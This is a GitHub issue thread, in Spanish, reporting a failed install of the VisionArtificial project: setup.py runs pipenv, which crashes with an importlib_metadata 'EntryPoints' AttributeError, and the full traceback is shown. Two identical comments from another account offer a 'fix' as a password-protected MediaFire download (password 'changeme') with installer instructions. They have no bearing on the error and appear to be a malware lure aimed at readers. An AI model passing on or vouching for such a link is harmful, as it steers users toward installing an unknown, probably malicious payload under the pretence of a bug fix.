### ISSUE TITLE
Problema con la instalación

### ISSUE THREAD

**Issue by facu777** [AgustinMadygraf/VisionArtificial#4]
Después de ejecutar  setup.py  me aparecieron los siguientes mensajes en la consola
```
Traceback (most recent call last):
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\runpy.py", line 197, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\runpy.py", line 87, in _run_code
    exec(code, run_globals)
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\site-packages\pipenv\__main__.py", line 5, in <module>
    cli()
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\Lib\site-packages\pipenv\vendor\click\core.py", line 829, in __call__
    return self.main(*args, **kwargs)
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\Lib\site-packages\pipenv\vendor\click\core.py", line 781, in main
    with self.make_context(prog_name, args, **extra) as ctx:
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\Lib\site-packages\pipenv\vendor\click\core.py", line 700, in make_context
    self.parse_args(ctx, args)
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\Lib\site-packages\pipenv\vendor\click\core.py", line 1212, in parse_args
    rest = Command.parse_args(self, ctx, args)
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\Lib\site-packages\pipenv\vendor\click\core.py", line 1044, in parse_args
    parser = self.make_parser(ctx)
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\Lib\site-packages\pipenv\vendor\click\core.py", line 965, in make_parser
    for param in self.get_params(ctx):
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\Lib\site-packages\pipenv\vendor\click\core.py", line 912, in get_params
    help_option = self.get_help_option(ctx)
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\site-packages\pipenv\cli\options.py", line 27, in get_help_option
    from ..core import format_help
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\site-packages\pipenv\core.py", line 33, in <module>
    from .project import Project
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\site-packages\pipenv\project.py", line 30, in <module>
    from .vendor.requirementslib.models.utils import get_default_pyproject_backend
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\site-packages\pipenv\vendor\requirementslib\__init__.py", line 9, in <module>
    from .models.lockfile import Lockfile
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\site-packages\pipenv\vendor\requirementslib\models\lockfile.py", line 16, in <module>
    from .requirements import Requirement
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\site-packages\pipenv\vendor\requirementslib\models\requirements.py", line 53, in <module>      
    from .setup_info import (
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\site-packages\pipenv\vendor\requirementslib\models\setup_info.py", line 52, in <module>
    from setuptools.dist import distutils, Distribution
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\site-packages\setuptools\__init__.py", line 21, in <module>
    from .dist import Distribution
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\site-packages\setuptools\dist.py", line 29, in <module>
    from . import _entry_points
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\site-packages\setuptools\_entry_points.py", line 44, in <module>
    def validate(eps: metadata.EntryPoints):
AttributeError: module 'importlib_metadata' has no attribute 'EntryPoints'
Traceback (most recent call last):
  File "c:\Users\facun\VisionArtificial\setup.py", line 73, in <module>
    iniciar()
  File "c:\Users\facun\VisionArtificial\setup.py", line 65, in iniciar
    subprocess.check_call([python_executable, '-m', 'pipenv', 'install'])
  File "C:\Users\facun\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 373, in check_call
    raise CalledProcessError(retcode, cmd)
subprocess.CalledProcessError: Command '['C:\\Users\\facun\\AppData\\Local\\Programs\\Python\\Python39\\python.exe', '-m', 'pipenv', 'install']' returned non-zero exit status 1.
PS C:\Users\facun\VisionArtificial>
```

**Comment by facu777** [comment]
https://chatgpt.com/share/125b3974-dab3-4e94-ac4e-0c835ba172d0

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
